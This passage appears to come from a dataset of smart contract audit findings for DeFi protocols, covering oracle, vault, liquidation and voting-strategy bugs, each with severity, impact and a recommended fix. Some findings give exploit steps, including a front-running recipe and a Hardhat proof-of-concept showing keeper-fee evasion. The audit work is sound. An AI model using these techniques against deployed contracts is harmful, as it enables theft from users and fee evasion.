constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n -Borrower collateral that they are owed can get stuck in Vault and not sent back to them after calling `repay`чmediumчFirst, let's say that a borrower called `borrow` in `LiquidityBorrowingManager`. Then, they call increase `increaseCollateralBalance` with a large collateral amount. A short time later, they decide they want to `repay` so they call `repay`.\\nIn `repay`, we have the following code:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nNotice that if we have `collateralBalance > 0` BUT `!((currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT)` (i.e. the first part of the if condition is fine but the second is not. It makes sense the second part is not fine because the borrower is repaying not long after they borrowed, so fees haven't had a long time to accumulate), then we will still go to `currentFees = borrowing.dailyRateCollateralBalance;` but we will not do:\\n```\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n```\\n\\nHowever, later on in the code, we have:\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nSo, the borrower's collateral will actually not even be sent back to the LiquidityBorrowingManager from the Vault (since we never incremented liquidationBonus). We later do:\\n```\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n```\\n\\nSo clearly the user will not receive their collateral back.чYou should separate:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nInto two separate if statements. One should check if `collateralBalance > 0`, and if so, increment liquidationBonus. The other should check `(currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT` and if not, set `currentFees = borrowing.dailyRateCollateralBalance;`.чUser's collateral will be stuck in Vault when it should be sent back to them. This could be a large amount of funds if for example `increaseCollateralBalance` is called first.ч```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n -commitRequested() front-run malicious invalid oralceчmediumчExecution of the `commitRequested()` method restricts the `lastCommittedPublishTime` from going backward.\\n```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, \"\")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n\\n`commit()` has a similar limitation and can set `lastCommittedPublishTime`.\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n// rest of code\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code.\\n```\\n\\nThis leads to a situation where anyone can front-run `commitRequested()` and use his `updateData` to execute `commit()`. In order to satisfy the `commit()` constraint, we need to pass a `commit()` parameter set as follows\\nversionIndex= nextVersionIndexToCommit\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION\\nThis way `lastCommittedPublishTime` will be modified, causing `commitRequested()` to execute with `revert PythOracleNonIncreasingPublishTimes`\\nExample: Given: nextVersionIndexToCommit = 10 versionList[10] = 200\\n_latestVersion = 100\\nwhen:\\nkeeper exexute commitRequested(versionIndex = 10 , VAA{ publishTime = 205})\\nfront-run execute `commit(versionIndex = 10 , oracleVersion = 200-1 , VAA{ publishTime = 205})\\nversionIndex= nextVersionIndexToCommit (pass)\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion (pass)\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION (pass)\\nBy the time the `keeper` submits the next VVA, the price may have passed its expiration dateчcheck `pythPrice` whether valid for `nextVersionIndexToCommit`\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n // Must be before the next requested version to commit, if it exists\\n // Otherwise, try to commit it as the next request version to commit\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(oracleVersion, updateData);\\n\\n // Price must be more recent than that of the most recently committed version\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n\\n // Oracle version must be more recent than that of the most recently committed version\\n uint256 minVersion = _latestVersion;\\n uint256 maxVersion = versionList.length > versionIndex ? versionList[versionIndex] : current();\\n\\n if (versionIndex < nextVersionIndexToCommit) revert PythOracleVersionIndexTooLowError();\\n if (versionIndex > nextVersionIndexToCommit && block.timestamp <= versionList[versionIndex - 1] // Add the line below\\n GRACE_PERIOD)\\n revert PythOracleGracePeriodHasNotExpiredError();\\n if (oracleVersion <= minVersion || oracleVersion >= maxVersion) revert PythOracleVersionOutsideRangeError();\\n// Add the line below\\n if (nextVersionIndexToCommit < versionList.length) {\\n// Add the line below\\n if (\\n// Add the line below\\n pythPrice.publishTime >= versionList[nextVersionIndexToCommit] // Add the line below\\n MIN_VALID_TIME_AFTER_VERSION &&\\n// Add the line below\\n pythPrice.publishTime <= versionList[nextVersionIndexToCommit] // Add the line below\\n MAX_VALID_TIME_AFTER_VERSION\\n// Add the line below\\n ) revert PythOracleUpdateValidForPreviousVersionError();\\n// Add the line below\\n }\\n\\n\\n _recordPrice(oracleVersion, pythPrice);\\n nextVersionIndexToCommit = versionIndex;\\n _latestVersion = oracleVersion;\\n }\\n```\\nчIf the user can control the oralce invalidation, it can lead to many problems e.g. invalidating `oracle` to one's own detriment, not having to take losses Maliciously destroying other people's profits, etc.ч```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, \"\")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n -`Vault.update(anyUser,0,0,0)` can be called for free to increase `checkpoint.count` and pay smaller keeper fee than necessaryчmediumч`Vault._update(user, 0, 0, 0)` will pass all invariants checks:\\n```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n\\nIt then calculates amount to claim by calling _socialize:\\n```\\n// asses socialization and settlement fee\\nUFixed6 claimAmount = _socialize(context, depositAssets, redeemShares, claimAssets);\\n// rest of code\\nfunction _socialize(\\n Context memory context,\\n UFixed6 depositAssets,\\n UFixed6 redeemShares,\\n UFixed6 claimAssets\\n) private view returns (UFixed6 claimAmount) {\\n // @audit global assets must be 0 to make (0,0,0) pass this function\\n if (context.global.assets.isZero()) return UFixed6Lib.ZERO;\\n UFixed6 totalCollateral = UFixed6Lib.from(_collateral(context).max(Fixed6Lib.ZERO));\\n claimAmount = claimAssets.muldiv(totalCollateral.min(context.global.assets), context.global.assets);\\n\\n // @audit for (0,0,0) this will revert (underflow)\\n if (depositAssets.isZero() && redeemShares.isZero()) claimAmount = claimAmount.sub(context.settlementFee);\\n}\\n```\\n\\n`_socialize` will immediately return 0 if `context.global.assets == 0`. If `context.global.assets > 0`, then this function will revert in the last line due to underflow (trying to subtract `settlementFee` from 0 claimAmount)\\nThis is the condition for this issue to happen: global assets must be 0. Global assets are the amounts redeemed but not yet claimed by users. So this can reasonably happen in the first days of the vault life, when users mostly only deposit, or claim everything they withdraw.\\nOnce this function passes, the following lines increase checkpoint.count:\\n```\\n// update positions\\ncontext.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.currentCheckpoint.update(depositAssets, redeemShares);\\n// rest of code\\n// Checkpoint library:\\n// rest of code\\nfunction update(Checkpoint memory self, UFixed6 deposit, UFixed6 redemption) internal pure {\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n self.count++;\\n}\\n```\\n\\nThe rest of the function executes normally.\\nDuring position settlement, pending user deposits and redeems are reduced by the keeper fees / checkpoint.count:\\n```\\n// Account library:\\n// rest of code\\nfunction processLocal(\\n Account memory self,\\n uint256 latestId,\\n Checkpoint memory checkpoint,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.latest = latestId;\\n (self.assets, self.shares) = (\\n self.assets.add(checkpoint.toAssetsLocal(redemption)),\\n self.shares.add(checkpoint.toSharesLocal(deposit))\\n );\\n (self.deposit, self.redemption) = (self.deposit.sub(deposit), self.redemption.sub(redemption));\\n}\\n// rest of code\\n// Checkpoint library\\n// toAssetsLocal / toSharesLocal calls _withoutKeeperLocal to calculate keeper fees:\\n// rest of code\\n function _withoutKeeperLocal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 keeperPer = self.count == 0 ? UFixed6Lib.ZERO : self.keeper.div(UFixed6Lib.from(self.count));\\n return _withoutKeeper(amount, keeperPer);\\n }\\n```\\n\\nAlso notice that in `processLocal` the only thing which keeper fees influence are deposits and redemptions, but not claims.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('inflate checkpoint count', async () => {\\n const settlementFee = parse6decimal('10.00')\\n const marketParameter = { // rest of code(await market.parameter()) }\\n marketParameter.settlementFee = settlementFee\\n await market.connect(owner).updateParameter(marketParameter)\\n const btcMarketParameter = { // rest of code(await btcMarket.parameter()) }\\n btcMarketParameter.settlementFee = settlementFee\\n await btcMarket.connect(owner).updateParameter(btcMarketParameter)\\n\\n const deposit = parse6decimal('10000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n await updateOracle()\\n await vault.settle(user.address)\\n\\n const deposit2 = parse6decimal('10000')\\n await vault.connect(user2).update(user2.address, deposit2, 0, 0)\\n\\n // inflate checkpoint.count\\n await vault.connect(btcUser1).update(btcUser1.address, 0, 0, 0)\\n await vault.connect(btcUser2).update(btcUser2.address, 0, 0, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).settle(user2.address)\\n\\n const checkpoint2 = await vault.checkpoints(3)\\n console.log(\"checkpoint count = \" + checkpoint2.count)\\n\\n var account = await vault.accounts(user.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(\"User shares:\" + account.shares + \" assets: \" + assets);\\n var account = await vault.accounts(user2.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(\"User2 shares:\" + account.shares + \" assets: \" + assets);\\n})\\n```\\n\\nConsole output:\\n```\\ncheckpoint count = 3\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:10013140463 assets: 10003346584\\n```\\n\\nSo the user2 inflates his deposited amounts by paying smaller keeper fee.\\nIf 2 lines which inflate checkpoint count (after corresponding comment) are deleted, then the output is:\\n```\\ncheckpoint count = 1\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:9999780702 assets: 9989999890\\n```\\n\\nSo if not inflated, user2 pays correct amount and has roughly the same assets as user1 after his deposit.��Consider reverting (0,0,0) vault updates, or maybe redirecting to `settle` in this case. Additionally, consider updating checkpoint only if `depositAssets` or `redeemShares` are not zero:\\n```\\nif (!depositAssets.isZero() || !redeemShares.isZero())\\n context.currentCheckpoint.update(depositAssets, redeemShares);\\n```\\nчMalicious vault user can inflate `checkpoint.count` to pay much smaller keeper fee than they should at the expense of the other vault users.ч```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n -MultiInvoker liquidation action will revert most of the time due to incorrect closable amount initializationчmediumч`MultiInvoker` calculates the `closable` amount in its `_latest` function incorrectly. In particular, it doesn't initialize `closableAmount`, so it's set to 0 initially. It then scans pending positions, settling those which should be settled, and reducing `closableAmount` if necessary for remaining pending positions:\\n```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n\\nNotice, that `closableAmount` is initialized to `previousMagnitude` only if there is at least one position that needs to be settled. However, if `local.latestId == local.currentId` (which is the case for most of the liquidations - position becomes liquidatable due to price changes without any pending positions created by the user), this loop is skipped entirely, never setting `closableAmount`, so it's incorrectly returned as 0, although it's not 0 (it should be the latest settled position magnitude).\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\nчInitialize `closableAmount` to previousMagnitude:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n+ closableAmount = previousMagnitude;\\n```\\nчAll `MultiInvoker` liquidation actions will revert if trying to liquidate users without positions which can be settled, which can happen in 2 cases:\\nLiquidated user doesn't have any pending positions at all (local.latestId == local.currentId). This is the most common case (price has changed and user is liquidated without doing any actions) and we can reasonably expect that this will be the case for at least 50% of liquidations (probably more, like 80-90%).\\nLiquidated user does have pending positions, but no pending position is ready to be settled yet. For example, if liquidator commits unrequested oracle version which liquidates user, even if the user already has pending position (but which is not yet ready to be settled).\\nSince this breaks important `MultiInvoker` functionality in most cases and causes loss of funds to liquidator (revert instead of getting liquidation fee), I believe this should be High severity.ч```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n -MultiInvoker liquidation action will revert due to incorrect closable amount calculation for invalid oracle versionsчmediumч`MultiInvoker` calculates the `closable` amount in its `_latest` function. This function basically repeats the logic of `Market._settle`, but fails to repeat it correctly for the invalid oracle version settlement. When invalid oracle version is settled, `latestPosition` invalidation should increment, but the `latestPosition` should remain the same. This is achieved in the `Market._processPositionLocal` by adjusting `newPosition` after invalidation before the `latestPosition` is set to newPosition:\\n```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n\\nHowever, `MultiInvoker` doesn't adjust the new position and simply sets `latestPosition` to new position both when oracle is valid or invalid:\\n```\\nif (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\nlatestPosition.update(pendingPosition);\\n```\\n\\nThis leads to incorrect value of `closableAmount` afterwards:\\n```\\npreviousMagnitude = latestPosition.magnitude();\\nclosableAmount = previousMagnitude;\\n```\\n\\nFor example, if `latestPosition.market = 10`, `pendingPosition.market = 0` and pendingPosition has invalid oracle, then:\\n`Market` will invalidate (latestPosition.invalidation.market = 10), adjust (pendingPosition.market = 10), set `latestPosition` to new `pendingPosition` (latestPosition.maker = pendingPosition.maker = 10), so `latestPosition.maker` correctly remains 10.\\n`MultiInvoker` will invalidate (latestPosition.invalidation.market = 10), and immediately set `latestPosition` to `pendingPosition` (latestPosition.maker = pendingPosition.maker = 0), so `latestPosition.maker` is set to 0 incorrectly.\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\nчBoth `Market` and `MultiInvoker` handle position settlement for invalid oracle versions incorrectly (Market issue with this was reported separately as it's completely different), so both should be fixed and the fix of this one will depend on how the `Market` bug is fixed. The way it is, `MultiInvoker` correctly adjusts pending position before invalidating `latestPosition` (which `Market` fails to do), however after such action `pendingPosition` must not be adjusted, because it was already adjusted and new adjustment should only change it by the difference from the last invalidation. The easier solution would be just not to change `latestPosition` in case of invalid oracle version, so the fix might be like this (just add else):\\n```\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n else latestPosition.update(pendingPosition);\\n```\\n\\nHowever, if the `Market` bug is fixed the way I proposed it (by changing `invalidate` function to take into account difference in invalidation of `latestPosition` and pendingPosition), then this fix will still be incorrect, because `invalidate` will expect unadjusted `pendingPosition`, so in this case `pendingPosition` should not be adjusted after loading it, but it will have to be adjusted for positions not yet settled. So the fix might look like this:\\n```\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n- pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n- latestPosition.update(pendingPosition);\\n+ else {\\n+ pendingPosition.adjust(latestPosition);\\n+ latestPosition.update(pendingPosition);\\n+ }\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n+ pendingPosition.adjust(latestPosition);\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n```\\nчIf there is an invalid oracle version during pending position settlement in `MultiInvoker` liquidation action, it will incorrectly revert and will cause loss of funds for the liquidator who should have received liquidation fee, but reverts instead.\\nSince this breaks important `MultiInvoker` functionality in some rare edge cases (invalid oracle version, user has unsettled position which should settle during user liquidation with `LIQUIDATION` action of MultiInvoker), this should be a valid medium finding.ч```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n -Invalid oracle version can cause the vault to open too large and risky position and get liquidated due to using unadjusted global current positionчmediumч`StrategyLib._loadContext` for the market loads `currentPosition` as:\\n```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n\\nHowever, this is unadjusted position, so its value is incorrect if invalid oracle version happens while this position is pending.\\nLater on, when calculating minimum and maxmium positions enforced by the vault in the market, they're calculated in _positionLimit:\\n```\\nfunction _positionLimit(MarketContext memory context) private pure returns (UFixed6, UFixed6) {\\n return (\\n // minimum position size before crossing the net position\\n context.currentAccountPosition.maker.sub(\\n context.currentPosition.maker\\n .sub(context.currentPosition.net().min(context.currentPosition.maker))\\n .min(context.currentAccountPosition.maker)\\n .min(context.closable)\\n ),\\n // maximum position size before crossing the maker limit\\n context.currentAccountPosition.maker.add(\\n context.riskParameter.makerLimit\\n .sub(context.currentPosition.maker.min(context.riskParameter.makerLimit))\\n )\\n );\\n}\\n```\\n\\nAnd the target maker size for the market is set in allocate:\\n```\\n(targets[marketId].collateral, targets[marketId].position) = (\\n Fixed6Lib.from(_locals.marketCollateral).sub(contexts[marketId].local.collateral),\\n _locals.marketAssets\\n .muldiv(registrations[marketId].leverage, contexts[marketId].latestPrice.abs())\\n .min(_locals.maxPosition)\\n .max(_locals.minPosition)\\n);\\n```\\n\\nSince `context.currentPosition` is incorrect, it can happen that both `_locals.minPosition` and `_locals.maxPosition` are too high, the vault will open too large and risky position, breaking its risk limit and possibly getting liquidated, especially if it happens during high volatility.чAdjust global current position after loading it:\\n```\\n context.currentPosition = registration.market.pendingPosition(global.currentId);\\n+ context.currentPosition.adjust(registration.market.position());\\n```\\nчIf invalid oracle version happens, the vault might open too large and risky position in such market, potentially getting liquidated and vault users losing funds due to this liquidation.ч```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n -`QVSimpleStrategy` never updates `allocator.voiceCredits`.чhighч```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n\\n```\\n function _hasVoiceCreditsLeft(uint256 _voiceCreditsToAllocate, uint256 _allocatedVoiceCredits)\\n internal\\n view\\n override\\n returns (bool)\\n {\\n return _voiceCreditsToAllocate + _allocatedVoiceCredits <= maxVoiceCreditsPerAllocator;\\n }\\n```\\n\\nThe problem is that `allocator.voiceCredits` is always zero. Both `QVSimpleStrategy` and `QVBaseStrategy` don't update `allocator.voiceCredits`. Thus, allocators can cast more votes than `maxVoiceCreditsPerAllocator`.чUpdates `allocator.voiceCredits` in `QVSimpleStrategy._allocate`.\\n```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, 